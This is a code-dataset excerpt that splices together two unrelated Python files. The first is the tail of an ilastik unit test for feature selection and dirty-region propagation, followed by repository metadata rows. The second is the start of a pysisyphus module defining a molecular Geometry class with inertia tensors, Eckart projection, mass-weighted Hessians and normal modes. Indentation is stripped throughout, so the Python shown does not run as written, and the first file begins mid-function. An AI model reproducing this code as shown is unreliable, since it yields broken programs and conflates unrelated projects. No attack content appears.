data2d = vigra.taggedView(data2d, axistags='txyzc')
# Define operators
opFeatures = OpFeatureSelection('Original', graph=graph)
opFeatures.Scales.connect(self.opFeatures.Scales[0])
opFeatures.FeatureIds.connect(self.opFeatures.FeatureIds[0])
opFeatures.SelectionMatrix.connect(self.opFeatures.SelectionMatrix[0])
# Set input data
opFeatures.InputImage.setValue(data2d)
# Compute results for the top slice only
topSlice = [0, slice(None), slice(None), 0, slice(None)]
result = opFeatures.OutputImage[topSlice].wait()
def testDirtyPropagation(self):
opFeatures = self.opFeatures
dirtyRois = []
def handleDirty( slot, roi ):
dirtyRois.append( roi )
opFeatures.OutputImage[0].notifyDirty( handleDirty )
# Change the matrix
selections = numpy.array( [[True, False, False, False, False, False, False], # Gaussian
[False, True, False, False, False, False, False], # L of G
[False, False, True, False, False, False, False], # ST EVs
[False, False, False, True, False, False, False], # H of G EVs
[False, False, False, False, False, False, False], # GGM
[False, False, False, False, False, False, False]] ) # Diff of G
opFeatures.SelectionMatrix.setValue(selections)
assert len(dirtyRois) == 1
assert (dirtyRois[0].start, dirtyRois[0].stop) == sliceToRoi( slice(None), self.opFeatures.OutputImage[0].meta.shape )
if __name__ == "__main__":
import sys
import nose
sys.argv.append("--nocapture") # Don't steal stdout. Show it on the console as usual.
sys.argv.append("--nologcapture") # Don't set the logging level to DEBUG. Leave it alone.
nose.run(defaultTest=__file__)
|
nielsbuwen/ilastik
|
tests/test_applets/featureSelection/testOpFeatureSelection.py
|
Python
|
gpl-3.0
| 6,640
|
[
"Gaussian"
] |
96ed3df462eb27e82571864b76fe38e9eaeaf2d07d49cb11e2a0fae7d17acce6
|
from collections import Counter, namedtuple
import copy
import itertools as it
import re
import subprocess
import tempfile
import sys
import h5py
import numpy as np
from scipy.spatial.distance import pdist
from scipy.spatial.transform import Rotation
import rmsd
try:
from thermoanalysis.QCData import QCData
from thermoanalysis.thermo import thermochemistry
except ModuleNotFoundError:
pass
from pysisyphus import logger
from pysisyphus.config import p_DEFAULT, T_DEFAULT
from pysisyphus.constants import BOHR2ANG
from pysisyphus.elem_data import (
MASS_DICT,
ISOTOPE_DICT,
ATOMIC_NUMBERS,
COVALENT_RADII as CR,
)
from pysisyphus.helpers_pure import eigval_to_wavenumber, full_expand
from pysisyphus.intcoords import DLC, RedundantCoords, TRIC
from pysisyphus.intcoords.exceptions import (
NeedNewInternalsException,
RebuiltInternalsException,
DifferentCoordLengthsException,
)
from pysisyphus.intcoords.helpers import get_tangent
from pysisyphus.intcoords.setup import BOND_FACTOR
from pysisyphus.intcoords.setup_fast import find_bonds
from pysisyphus.xyzloader import make_xyz_str
def inertia_tensor(coords3d, masses):
"""Inertita tensor.
| x² xy xz |
(x y z)^T . (x y z) = | xy y² yz |
| xz yz z² |
"""
x, y, z = coords3d.T
squares = np.sum(coords3d ** 2 * masses[:, None], axis=0)
I_xx = squares[1] + squares[2]
I_yy = squares[0] + squares[2]
I_zz = squares[0] + squares[1]
I_xy = -np.sum(masses * x * y)
I_xz = -np.sum(masses * x * z)
I_yz = -np.sum(masses * y * z)
I = np.array(((I_xx, I_xy, I_xz), (I_xy, I_yy, I_yz), (I_xz, I_yz, I_zz)))
return I
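# Illustrative sketch (hypothetical input): for two unit masses at +/-1 Bohr
# on the x axis,
#   inertia_tensor(np.array([[1.0, 0.0, 0.0], [-1.0, 0.0, 0.0]]),
#                  np.array([1.0, 1.0]))
# gives diag(0.0, 2.0, 2.0); there is no moment about the x axis itself.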
def get_trans_rot_vectors(cart_coords, masses, rot_thresh=1e-6):
"""Vectors describing translation and rotation.
These vectors are used for the Eckart projection by constructing
a projector from them.
    See Martin J. Field - A Practical Introduction to the Simulation
of Molecular Systems, 2007, Cambridge University Press, Eq. (8.23),
(8.24) and (8.26) for the actual projection.
See also https://chemistry.stackexchange.com/a/74923.
Parameters
----------
cart_coords : np.array, 1d, shape (3 * atoms.size, )
        Cartesian coordinates.
masses : iterable, 1d, shape (atoms.size, )
Atomic masses in amu.
Returns
-------
ortho_vecs : np.array(6, 3*atoms.size)
2d array containing row vectors describing translations
and rotations.
"""
coords3d = np.reshape(cart_coords, (-1, 3))
total_mass = masses.sum()
com = 1 / total_mass * np.sum(coords3d * masses[:, None], axis=0)
coords3d_centered = coords3d - com[None, :]
    # The inertia tensor is evaluated at the center of mass.
    I = inertia_tensor(coords3d_centered, masses)
_, Iv = np.linalg.eigh(I)
Iv = Iv.T
masses_rep = np.repeat(masses, 3)
sqrt_masses = np.sqrt(masses_rep)
num = len(masses)
def get_trans_vecs():
"""Mass-weighted unit vectors of the three cartesian axes."""
for vec in ((1, 0, 0), (0, 1, 0), (0, 0, 1)):
_ = sqrt_masses * np.tile(vec, num)
yield _ / np.linalg.norm(_)
def get_rot_vecs():
"""As done in geomeTRIC."""
rot_vecs = np.zeros((3, cart_coords.size))
# p_vecs = Iv.dot(coords3d_centered.T).T
for i in range(masses.size):
p_vec = Iv.dot(coords3d_centered[i])
for ix in range(3):
rot_vecs[0, 3 * i + ix] = Iv[2, ix] * p_vec[1] - Iv[1, ix] * p_vec[2]
rot_vecs[1, 3 * i + ix] = Iv[2, ix] * p_vec[0] - Iv[0, ix] * p_vec[2]
rot_vecs[2, 3 * i + ix] = Iv[0, ix] * p_vec[1] - Iv[1, ix] * p_vec[0]
rot_vecs *= sqrt_masses[None, :]
return rot_vecs
trans_vecs = list(get_trans_vecs())
rot_vecs = np.array(get_rot_vecs())
# Drop vectors with vanishing norms
rot_vecs = rot_vecs[np.linalg.norm(rot_vecs, axis=1) > rot_thresh]
tr_vecs = np.concatenate((trans_vecs, rot_vecs), axis=0)
tr_vecs = np.linalg.qr(tr_vecs.T)[0].T
return tr_vecs
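# Shape sketch (following from the code above): for a nonlinear molecule of N
# atoms this returns an orthonormalized (6, 3N) array (3 translations plus 3
# rotations); for a linear molecule one rotation vector has vanishing norm and
# is dropped, giving (5, 3N).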
def get_trans_rot_projector(cart_coords, masses, full=False):
tr_vecs = get_trans_rot_vectors(cart_coords, masses=masses)
U, s, _ = np.linalg.svd(tr_vecs.T)
if full:
P = np.eye(cart_coords.size)
for tr_vec in tr_vecs:
P -= np.outer(tr_vec, tr_vec)
else:
P = U[:, s.size :].T
return P
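# Mode sketch (following from the code above): with full=True, P is the square
# (3N, 3N) projector I - sum_i outer(tr_i, tr_i); with full=False it is the
# rectangular (3N - 6, 3N) orthonormal basis of the complement, so
# P.dot(H_mw).dot(P.T) yields the Hessian with translation/rotation removed.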
class Geometry:
coord_types = {
"cart": None,
"redund": RedundantCoords,
"dlc": DLC,
"tric": TRIC,
}
def __init__(
self,
atoms,
coords,
fragments=None,
coord_type="cart",
coord_kwargs=None,
isotopes=None,
freeze_atoms=None,
comment="",
name="",
):
"""Object representing atoms in a coordinate system.
The Geometry represents atoms and their positions in coordinate
system. By default cartesian coordinates are used, but internal
coordinates are also possible.
Parameters
----------
atoms : iterable
Iterable of length N, containing element symbols.
coords : 1d iterable
1d iterable of length 3N, containing the cartesian coordinates
of N atoms.
fragments : dict, optional
Dict with different keys denoting different fragments. The values
contain lists of atom indices.
coord_type : {"cart", "redund"}, optional
Type of coordinate system to use. Right now cartesian (cart)
and redundand (redund) are supported.
coord_kwargs : dict, optional
Dictionary containing additional arguments that get passed
to the constructor of the internal coordinate class.
isotopes : iterable of pairs, optional
Iterable of pairs consisting of 0-based atom index and either an integer
or a float. If an integer is given the closest isotope mass will be selected.
Given a float, this float will be directly used as mass.
freeze_atoms : iterable of integers
Specifies which atoms should remain fixed at their initial positions.
comment : str, optional
Comment string.
name : str, optional
Verbose name of the geometry, e.g. methanal or water. Used for printing
"""
self.atoms = atoms
# self._coords always holds cartesian coordinates.
self._coords = np.array(coords, dtype=float).flatten()
assert self._coords.size == (3 * len(self.atoms)), (
f"Expected 3N={3*len(self.atoms)} cartesian coordinates but got "
f"{self._coords.size}. Did you accidentally supply internal "
"coordinates?"
)
if fragments is None:
fragments = dict()
self.fragments = fragments
if isotopes is None:
isotopes = list()
self.isotopes = isotopes
if freeze_atoms is None:
freeze_atoms = list()
elif type(freeze_atoms) is str:
freeze_atoms = full_expand(freeze_atoms)
self.freeze_atoms = np.array(freeze_atoms, dtype=int)
assert all(self.freeze_atoms >= 0) and (
(self.freeze_atoms.size == 0) or (self.freeze_atoms.max() < len(self.atoms))
)
if (coord_type == "cart") and not (coord_kwargs is None or coord_kwargs == {}):
print(
"coord_type is set to 'cart' but coord_kwargs were given. "
"This is probably not intended. Exiting!"
)
sys.exit()
self.coord_type = coord_type
coord_kwargs = coord_kwargs if coord_kwargs is not None else {}
coord_class = self.coord_types[self.coord_type]
if coord_class:
assert (
                self._coords.size != 3
), "Only 'coord_type': 'cart' makes sense for coordinates of length 3!"
if (self.freeze_atoms is not None) and ("freeze_atoms" not in coord_kwargs):
coord_kwargs["freeze_atoms"] = freeze_atoms
self.internal = coord_class(
atoms,
self.coords3d.copy(),
**coord_kwargs,
)
else:
self.internal = None
self.comment = comment
self.name = name
self._masses = None
self._energy = None
self._forces = None
self._hessian = None
self.calculator = None
@property
def sum_formula(self):
return "_".join(
[f"{atom.title()}{num}" for atom, num in Counter(self.atoms).items()]
)
def assert_compatibility(self, other):
"""Assert that two Geometries can be substracted from each other.
Parameters
----------
other : Geometry
Geometry for comparison.
"""
same_atoms = self.atoms == other.atoms
same_coord_type = self.coord_type == other.coord_type
same_coord_length = len(self.coords) == len(other.coords)
assert same_atoms, "Atom number/ordering is incompatible!"
assert same_coord_type, "coord_types are incompatible!"
try:
assert same_coord_length, "Different length of coordinate vectors!"
except AssertionError:
raise DifferentCoordLengthsException
def __eq__(self, other):
return (self.atoms == other.atoms) and all(self.coords == other.coords)
def __sub__(self, other):
self.assert_compatibility(other)
if self.coord_type == "cart":
diff = self.coords - other.coords
elif self.coord_type in ("redund", "dlc"):
# Take periodicity of dihedrals into account by calling
# get_tangent(). Care has to be taken regarding the orientation
# of the returned tangent vector. It points from self to other.
#
# As we want to return the difference between two vectors we
# have to reverse the direction of the tangent by multiplying it
# with -1 to be consistent with basic subtraction laws ...
# A - B = C, where C is a vector pointing from B to A (B + C = A)
# In our case get_tangent returns B - A, that is a vector pointing
# from A to B.
diff = -get_tangent(
self.internal.prim_coords,
other.internal.prim_coords,
self.internal.dihedral_indices,
)
else:
raise Exception("Invalid coord_type!")
# Convert to DLC
if self.coord_type == "dlc":
diff = self.internal.U.T.dot(diff)
return diff
def __add__(self, other):
atoms = tuple(self.atoms) + tuple(other.atoms)
coords = np.concatenate((self.cart_coords, other.cart_coords))
return Geometry(atoms, coords)
def atom_xyz_iter(self):
return iter(zip(self.atoms, self.coords3d))
def copy(self, coord_type=None, coord_kwargs=None):
"""Returns a new Geometry object with same atoms and coordinates.
Parameters
----------
coord_type : str
Desired coord_type, defaults to current coord_type.
coord_kwargs : dict, optional
Any desired coord_kwargs that will be passed to the RedundantCoords
object.
Returns
-------
geom : Geometry
New Geometry object with the same atoms and coordinates.
"""
if coord_type is None:
coord_type = self.coord_type
if coord_kwargs is None:
coord_kwargs = dict()
# Geometry constructor will exit when coord_kwargs are given
# with coord_type == 'cart'. So we only supply it when we are
# NOT using cartesian coordinates.
_coord_kwargs = None
if coord_type != "cart":
try:
typed_prims = self.internal.typed_prims
# Will be raised if the current coord_type is 'cart'
except AttributeError:
typed_prims = None
_coord_kwargs = {
"typed_prims": typed_prims,
"check_bends": True,
}
_coord_kwargs.update(coord_kwargs)
return Geometry(
self.atoms,
self._coords.copy(),
coord_type=coord_type,
coord_kwargs=_coord_kwargs,
isotopes=copy.deepcopy(self.isotopes),
freeze_atoms=self.freeze_atoms.copy(),
)
def copy_all(self, coord_type=None, coord_kwargs=None):
new_geom = self.copy(coord_type, coord_kwargs)
new_geom.set_calculator(self.calculator)
new_geom.energy = self._energy
if self._forces is not None:
new_geom.cart_forces = self._forces
if self._hessian is not None:
new_geom.cart_hessian = self._hessian
return new_geom
def atom_indices(self):
"""Dict with atom types as key and corresponding indices as values.
Returns
-------
inds_dict : dict
Unique atom types as keys, corresponding indices as values.
"""
inds_dict = {}
for atom_type in set(self.atoms):
inds_dict[atom_type] = [
i for i, atom in enumerate(self.atoms) if atom == atom_type
]
return inds_dict
@property
def atom_types(self):
return set(self.atoms)
@property
def atomic_numbers(self):
return [ATOMIC_NUMBERS[a.lower()] for a in self.atoms]
def get_fragments(self, regex):
regex = re.compile(regex)
frags = [frag for frag in self.fragments.keys() if regex.search(frag)]
org_indices = list(it.chain(*[self.fragments[frag] for frag in frags]))
new_atoms = [self.atoms[ind] for ind in org_indices]
new_coords = self.coords3d[org_indices].copy()
new_fragments = dict()
i = 0
for frag in frags:
frag_atoms = len(self.fragments[frag])
new_fragments[frag] = list(range(i, i + frag_atoms))
i += frag_atoms
return Geometry(new_atoms, new_coords, fragments=new_fragments)
@property
def layers(self):
try:
layers = self.calculator.layers
except AttributeError:
layers = (None,)
return layers
def del_atoms(self, inds, **kwargs):
atoms = [atom for i, atom in enumerate(self.atoms) if not (i in inds)]
c3d = self.coords3d
coords3d = np.array(
[c3d[i] for i, _ in enumerate(self.atoms) if not (i in inds)]
)
return Geometry(atoms, coords3d.flatten(), **kwargs)
def set_calculator(self, calculator, clear=True):
"""Reset the object and set a calculator."""
if clear:
self.clear()
self.calculator = calculator
@property
def is_analytical_2d(self):
try:
return self.calculator.analytical_2d
except AttributeError:
return False
@property
def mm_inv(self):
"""Inverted mass matrix.
Returns a diagonal matrix containing the inverted atomic
masses.
"""
return np.diag(1 / self.masses_rep)
@property
def mm_sqrt_inv(self):
"""Inverted square root of the mass matrix."""
return np.diag(1 / (self.masses_rep ** 0.5))
@property
def coords(self):
"""1d vector of atomic coordinates.
Returns
-------
coords : np.array
1d array holding the current coordinates.
"""
if self.internal:
coords = self.internal.coords
else:
# self._coords will always hold Cartesian coordinates.
coords = self._coords
return coords
def set_coord(self, ind, coord):
"""Set a coordinate by index.
Parameters
----------
ind : int
            Index of the coordinate to set in the self.coords array.
coord : float
Coordinate value.
"""
assert (
self.coord_type == "cart" and len(self.freeze_atoms) == 0
), "set_coord was not yet tested with coord_type != 'cart' and frozen atoms!"
self.coords[ind] = coord
self.clear()
def set_coords(self, coords, cartesian=False, update_constraints=False):
coords = np.array(coords).flatten()
# Do Internal->Cartesian backtransformation if internal coordinates are used.
if self.internal:
# When internal coordinates are employed it may happen, that the underlying
# Cartesian coordinates are updated, e.g. from the IPIServer calculator, which
# may yield different internal coordinates.
#
# Here we update the Cartesians of the internal coordinate object to the new
# values and calculate new internal coordinates, from which we can derive a step
# in internals.
if cartesian:
self.assert_cart_coords(coords)
cart_coords = coords.copy()
# Update Cartesians of internal coordinate object and calculate
# new internals.
self.internal.coords3d = coords
# Determine new internal coordinates, so we can later calculate a
# step in internal coordinates.
coords = self.internal.coords
# Finally we also update the Cartesian coordinates of the Geometry object,
# so the subsequent sanity check does not fail. This also allows updating
            # the coordinates of atoms that are frozen. We set Geometry._coords directly,
# instead of Geometry.cart_coords or Geometry.coords3d, to avoid an infinite
# recursion.
self._coords = cart_coords
# Sanity check, asserting that the cartesian coordinates of the
# Geometry object and the internal coordinate object are the same.
np.testing.assert_allclose(self.coords3d, self.internal.coords3d)
try:
int_step = coords - self.internal.coords
cart_step = self.internal.transform_int_step(
int_step, update_constraints=update_constraints
)
# From now on coords will always hold Cartesian coordinates!
coords = self._coords + cart_step
except NeedNewInternalsException as exception:
invalid_inds = exception.invalid_inds
valid_typed_prims = [
typed_prim
for i, typed_prim in enumerate(self.internal.typed_prims)
if i not in invalid_inds
]
coords3d = exception.coords3d.copy()
coord_class = self.coord_types[self.coord_type]
self.internal = coord_class(
# Instead of using only the remaining, valid typed_prims
# we could look for an entirely new set of typed_prims.
#
# But when we do this and we end up with more coordinates
# than before, this will lead to problems with the HDF5 dump.
# No problems arise when fewer coordinates are used
# (valid_typed_prims <= self.internal.typed_prims).
self.atoms,
coords3d,
typed_prims=valid_typed_prims,
)
self._coords = coords3d.flatten()
raise RebuiltInternalsException(
typed_prims=self.internal.typed_prims.copy()
)
# Restore original coordinates of frozen atoms. Right now this should
# be redundant, as the Cartesian step is also constrainted in the
# Internal->Cartesian backtransformation. But we keep it for now.
coords.reshape(-1, 3)[self.freeze_atoms] = self.coords3d[self.freeze_atoms]
# Set new Cartesian coordinates
self._coords = coords
# Reset all values because no calculations with the new coords
# have been performed yet.
self.clear()
def reset_coords(self, new_typed_prims):
if self.coord_type == "cart":
return
coord_class = self.coord_types[self.coord_type]
self.internal = coord_class(
self.atoms, self.coords3d, typed_prims=new_typed_prims
)
@coords.setter
def coords(self, coords):
"""Wrapper for saving coordinates internally.
Parameters
----------
coords : np.array
            1d array containing atomic coordinates. Its length
depends on the coordinate system.
"""
self.set_coords(coords)
@property
def coords3d(self):
"""Coordinates in 3d.
Returns
-------
coords3d : np.array
Coordinates of the Geometry as 2D array.
"""
return self._coords.reshape(-1, 3)
@coords3d.setter
def coords3d(self, coords3d):
self.set_coords(coords3d, cartesian=True)
@property
def cart_coords(self):
return self._coords
@cart_coords.setter
def cart_coords(self, coords):
self.set_coords(coords, cartesian=True)
@property
def coords_by_type(self):
"""Coordinates in 3d by atom type and their corresponding indices.
Returns
-------
cbt : dict
Dictionary with the unique atom types of the Geometry as keys.
            Its values are the 3d coordinates of the corresponding atom type.
inds : dict
Dictionary with the unique atom types of the Geometry as keys.
            Its values are the original indices of the 3d coordinates in the
whole coords3d array.
"""
cbt = dict()
inds = dict()
# for i, (atom, c3d) in enumerate(zip(self.atoms, self.coords3d)):
# cbt.setdefault(atom, list()).append((i, c3d.tolist()))
for i, (atom, c3d) in enumerate(zip(self.atoms, self.coords3d)):
cbt.setdefault(atom, list()).append((c3d))
inds.setdefault(atom, list()).append(i)
for atom, c3d in cbt.items():
cbt[atom] = np.array(c3d)
inds[atom] = np.array(inds[atom])
return cbt, inds
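    # Illustrative sketch (hypothetical water geometry): for atoms
    # ('O', 'H', 'H'), cbt == {'O': array of shape (1, 3), 'H': array of
    # shape (2, 3)} and inds == {'O': [0], 'H': [1, 2]}.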
@property
def comment(self):
en_width = 20
# Check if we have to drop an (old) energy entry
try:
_ = float(self._comment[:en_width])
# Drop old energy entry
self._comment = self._comment[en_width + 2 :]
except (ValueError, IndexError):
pass
# Prepend (new) energy, if present
if self._energy:
en_str = f"{self._energy: >{en_width}.8f} , "
else:
en_str = ""
return f"{en_str}{self._comment}"
@comment.setter
def comment(self, new_comment):
self._comment = new_comment
@property
def masses(self):
if self._masses is None:
masses = np.array([MASS_DICT[atom.lower()] for atom in self.atoms])
for atom_index, iso_mass in self.isotopes:
if "." not in str(iso_mass):
atom = self.atoms[atom_index].lower()
key = (atom, iso_mass)
try:
iso_mass = ISOTOPE_DICT[key]
except KeyError as err:
print(
f"Found no suitable mass for '{atom.capitalize()}' with approx. "
f"mass of ~{iso_mass} au!"
)
raise err
masses[atom_index] = float(iso_mass)
self.masses = masses
return self._masses
@masses.setter
def masses(self, masses):
assert len(masses) == len(self.atoms)
self._masses = np.array(masses, dtype=float)
@property
def masses_rep(self):
# Some of the analytical potentials are only 2D
repeat_masses = 2 if (self._coords.size == 2) else 3
return np.repeat(self.masses, repeat_masses)
@property
def total_mass(self):
return sum(self.masses)
def center_of_mass_at(self, coords3d):
"""Returns the center of mass at given coords3d.
Parameters
----------
coords3d : np.array, shape(N, 3)
            Cartesian coordinates.
Returns
-------
R : np.array, shape(3, )
Center of mass.
"""
return 1 / self.total_mass * np.sum(coords3d * self.masses[:, None], axis=0)
@property
def center_of_mass(self):
"""Returns the center of mass.
Returns
-------
R : np.array, shape(3, )
Center of mass.
"""
return self.center_of_mass_at(self.coords3d)
@property
def centroid(self):
"""Geometric center of the Geometry.
Returns
-------
R : np.array, shape(3, )
Geometric center of the Geometry.
"""
return self.coords3d.mean(axis=0)
def center(self):
self.coords3d -= self.centroid[None, :]
@property
def mw_coords(self):
"""Mass-weighted coordinates.
Returns
-------
mw_coords : np.array
            1d array containing the mass-weighted cartesian coordinates.
"""
return np.sqrt(self.masses_rep) * self._coords
@mw_coords.setter
def mw_coords(self, mw_coords):
"""Set mass-weighted coordinates."""
self.coords = mw_coords / np.sqrt(self.masses_rep)
def fd_coords3d_gen(self, step_size=1e-3):
"""Iterator returning 3d Cartesians for finite-differences."""
coords3d = self.coords3d.copy()
zeros = np.zeros_like(coords3d)
for i, _ in enumerate(self.coords3d):
for j in (0, 1, 2):
step = zeros.copy()
step[i, j] = step_size
yield i, j, coords3d + step, coords3d - step
@property
def covalent_radii(self):
return np.array([CR[a.lower()] for a in self.atoms])
@property
def inertia_tensor(self):
return inertia_tensor(self.coords3d, self.masses)
def principal_axes_are_aligned(self):
"""Check if the principal axes are aligned with the cartesian axes.
Returns
-------
aligned : bool
            Whether the principal axes are aligned or not.
        eigvecs : np.array
            Eigenvectors of the inertia tensor, as returned by np.linalg.eigh.
        """
w, v = np.linalg.eigh(self.inertia_tensor)
return np.allclose(v, np.eye(3)), v
def align_principal_axes(self):
"""Align the principal axes to the cartesian axes.
https://math.stackexchange.com/questions/145023
"""
I = self.inertia_tensor
w, v = np.linalg.eigh(I)
# rot = np.linalg.solve(v, np.eye(3))
# self.coords3d = rot.dot(self.coords3d.T).T
self.coords3d = v.T.dot(self.coords3d.T).T
def standard_orientation(self):
# Translate center of mass to cartesian origin
self.coords3d -= self.center_of_mass
# Try to rotate the principal axes onto the cartesian axes
for i in range(5):
self.align_principal_axes()
aligned, vecs = self.principal_axes_are_aligned()
if aligned:
break
def reparametrize(self):
try:
# TODO: allow skipping the update
results = self.calculator.get_coords(self.atoms, self.cart_coords)
self.set_coords(results["coords"], cartesian=True)
reparametrized = True
except AttributeError:
reparametrized = False
return reparametrized
@property
def energy(self):
"""Energy of the current atomic configuration.
Returns
-------
energy : float
Energy of the current atomic configuration.
"""
if self._energy is None:
results = self.calculator.get_energy(self.atoms, self._coords)
self.set_results(results)
return self._energy
@energy.setter
def energy(self, energy):
"""Internal wrapper for setting the energy.
Parameters
----------
energy : float
"""
self._energy = energy
@property
def cart_forces(self):
if self._forces is None:
results = self.calculator.get_forces(self.atoms, self._coords)
self.set_results(results)
return self._forces
@cart_forces.setter
def cart_forces(self, cart_forces):
cart_forces = np.array(cart_forces)
assert cart_forces.shape == self.cart_coords.shape
self._forces = cart_forces
@property
def forces(self):
"""Energy of the current atomic configuration.
Returns
-------
force : np.array
1d array containing the forces acting on the atoms. Negative
of the gradient.
"""
forces = self.cart_forces
if self.internal:
forces = self.internal.transform_forces(forces)
return forces
@forces.setter
def forces(self, forces):
"""Internal wrapper for setting the forces.
Parameters
----------
forces : np.array
"""
forces = np.array(forces)
assert forces.shape == self.cart_coords.shape
self._forces = forces
@property
def cart_gradient(self):
return -self.cart_forces
@cart_gradient.setter
def cart_gradient(self, cart_gradient):
self.cart_forces = -cart_gradient
@property
def gradient(self):
"""Negative of the force.
Returns
-------
gradient : np.array
1d array containing the negative of the current forces.
"""
return -self.forces
# @gradient.setter
# def gradient(self, gradient):
# """Internal wrapper for setting the gradient."""
# # No check here as this is handled by in the forces.setter.
# self.forces = -gradient
@property
def mw_gradient(self):
"""Mass-weighted gradient.
Returns
-------
mw_gradient : np.array
Returns the mass-weighted gradient.
"""
return -self.forces / np.sqrt(self.masses_rep)
@property
def cart_hessian(self):
if self._hessian is None:
results = self.calculator.get_hessian(self.atoms, self._coords)
self.set_results(results)
return self._hessian
@cart_hessian.setter
def cart_hessian(self, cart_hessian):
if cart_hessian is not None:
cart_hessian = np.array(cart_hessian)
assert cart_hessian.shape == (self.cart_coords.size, self.cart_coords.size)
self._hessian = cart_hessian
@property
def hessian(self):
"""Matrix of second derivatives of the energy in respect to atomic
displacements.
Returns
-------
hessian : np.array
2d array containing the second derivatives of the energy with respect
to atomic/coordinate displacements depending on the type of
            coordinate system.
"""
hessian = self.cart_hessian
if self.internal:
int_gradient = self.gradient
return self.internal.transform_hessian(hessian, int_gradient)
return hessian
# @hessian.setter
# def hessian(self, hessian):
# """Internal wrapper for setting the hessian."""
# assert hessian.shape == (self.coords.size, self.coords.size)
# self._hessian = hessian
def mass_weigh_hessian(self, hessian):
return self.mm_sqrt_inv.dot(hessian).dot(self.mm_sqrt_inv)
@property
def mw_hessian(self):
"""Mass-weighted hessian.
Returns
-------
mw_hessian : np.array
2d array containing the mass-weighted hessian M^(-1/2) H M^(-1/2).
"""
# M^(-1/2) H M^(-1/2)
# TODO: Do the right thing here when the hessian is not yet calculated.
        #       This would probably involve figuring out how to mass-weigh an
        #       internal coordinate Hessian... I think this is described in one
# of the Gonzalez-Schlegel-papers about the GS2 algorithm.
return self.mass_weigh_hessian(self.cart_hessian)
def unweight_mw_hessian(self, mw_hessian):
"""Unweight a mass-weighted hessian.
Parameters
----------
mw_hessian : np.array
Mass-weighted hessian to be unweighted.
Returns
-------
hessian : np.array
2d array containing the hessian.
"""
mm_sqrt = np.diag(self.masses_rep ** 0.5)
return mm_sqrt.dot(mw_hessian).dot(mm_sqrt)
def set_h5_hessian(self, fn):
with h5py.File(fn, "r") as handle:
atoms = handle.attrs["atoms"]
hessian = handle["hessian"][:]
        # Also check lengths, as zip would lead to truncation for
        # different lengths of self.atoms and atoms.
valid = (len(atoms) == len(self.atoms)) and all(
[ga.lower() == a.lower() for ga, a in zip(self.atoms, atoms)]
)
if valid:
self.cart_hessian = hessian
def get_normal_modes(self, cart_hessian=None, full=False):
"""Normal mode wavenumbers, eigenvalues and Cartesian displacements Hessian."""
if cart_hessian is None:
cart_hessian = self.cart_hessian
mw_hessian = self.mass_weigh_hessian(cart_hessian)
proj_hessian, P = self.eckart_projection(mw_hessian, return_P=True, full=full)
eigvals, eigvecs = np.linalg.eigh(proj_hessian)
mw_cart_displs = P.T.dot(eigvecs)
cart_displs = self.mm_sqrt_inv.dot(mw_cart_displs)
cart_displs /= np.linalg.norm(cart_displs, axis=0)
nus = eigval_to_wavenumber(eigvals)
return nus, eigvals, mw_cart_displs, cart_displs
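    # Usage sketch, assuming a calculator that provides a Hessian is attached:
    #   nus, eigvals, mw_displs, displs = geom.get_normal_modes()
    # nus holds wavenumbers; negative entries correspond to imaginary modes.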
def get_imag_frequencies(self, hessian=None, thresh=1e-6):
vibfreqs, eigvals, *_ = self.get_normal_modes(hessian)
return vibfreqs[eigvals < thresh]
def get_thermoanalysis(
self, energy=None, cart_hessian=None, T=T_DEFAULT, p=p_DEFAULT, point_group="c1"
):
        if cart_hessian is None:
            cart_hessian = self.cart_hessian
            # Delete any supplied energy value when a Hessian calculation is
            # carried out, so energy and Hessian stem from the same calculation.
            energy = None
        if energy is None:
            energy = self.energy
vibfreqs, *_ = self.get_normal_modes(cart_hessian)
try:
mult = self.calculator.mult
except AttributeError:
mult = 1
logger.debug(
"Multiplicity for electronic entropy could not be determined! "
f"Using 2S+1 = {mult}."
)
thermo_dict = {
"masses": self.masses,
"vibfreqs": vibfreqs,
"coords3d": self.coords3d,
"energy": energy,
"mult": mult,
}
qcd = QCData(thermo_dict, point_group=point_group)
thermo = thermochemistry(
qcd, temperature=T, pressure=p, invert_imags=-15.0, cutoff=25.0
)
return thermo
def get_trans_rot_projector(self, full=False):
return get_trans_rot_projector(self.cart_coords, masses=self.masses, full=full)
def eckart_projection(self, mw_hessian, return_P=False, full=False):
P = self.get_trans_rot_projector(full=full)
proj_hessian = P.dot(mw_hessian).dot(P.T)
if return_P:
return proj_hessian, P
else:
return proj_hessian
def calc_energy_and_forces(self):
"""Force a calculation of the current energy and forces."""
results = self.calculator.get_forces(self.atoms, self.cart_coords)
self.set_results(results)
def assert_cart_coords(self, coords):
assert coords.size == self.cart_coords.size, (
"This method only works with cartesian coordinate input. "
"Did you accidentally provide internal coordinates?"
)
def get_temporary_coords(self, coords):
if self.coord_type != "cart":
int_step = coords - self.internal.coords
cart_step = self.internal.transform_int_step(int_step, pure=True)
coords = self.cart_coords + cart_step
self.assert_cart_coords(coords)
return coords
def get_energy_at(self, coords):
coords = self.get_temporary_coords(coords)
return self.calculator.get_energy(self.atoms, coords)["energy"]
def get_energy_at_cart_coords(self, cart_coords):
self.assert_cart_coords(cart_coords)
return self.calculator.get_energy(self.atoms, cart_coords)["energy"]
def get_energy_and_forces_at(self, coords):
"""Calculate forces and energies at the given coordinates.
The results are not saved in the Geometry object."""
coords = self.get_temporary_coords(coords)
results = self.calculator.get_forces(self.atoms, coords)
self.zero_frozen_forces(results["forces"])
if self.coord_type != "cart":
results["forces"] = self.internal.transform_forces(results["forces"])
return results
def get_energy_and_cart_forces_at(self, cart_coords):
self.assert_cart_coords(cart_coords)
results = self.calculator.get_forces(self.atoms, cart_coords)
self.zero_frozen_forces(results["forces"])
return results
def get_energy_and_cart_hessian_at(self, cart_coords):
self.assert_cart_coords(cart_coords)
results = self.calculator.get_hessian(self.atoms, cart_coords)
return results
def calc_double_ao_overlap(self, geom2):
return self.calculator.run_double_mol_calculation(
self.atoms, self.coords, geom2.coords
)
def zero_frozen_forces(self, cart_forces):
cart_forces.reshape(-1, 3)[self.freeze_atoms] = 0.0
def clear(self):
"""Reset the object state."""
self._energy = None
self._forces = None
self._hessian = None
self.true_forces = None
self.true_energy = None
self.all_energies = None
def set_results(self, results):
"""Save the results from a dictionary.
Parameters
----------
results : dict
The keys in this dict will be set as attributes in the current
object, with the corresponding item as value.
"""
trans = {
"energy": "energy",
"forces": "cart_forces",
"hessian": "cart_hessian",
# True properties in AFIR calculations
"true_forces": "true_forces",
"true_energy": "true_energy",
# Overlap calculator; includes excited states
"all_energies": "all_energies",
}
for key in results:
# Zero forces of frozen atoms
if key == "forces":
self.zero_frozen_forces(results[key])
setattr(self, trans[key], results[key])
self.results = results
def as_xyz(self, comment="", cart_coords=None):
"""Current geometry as a string in XYZ-format.
Parameters
----------
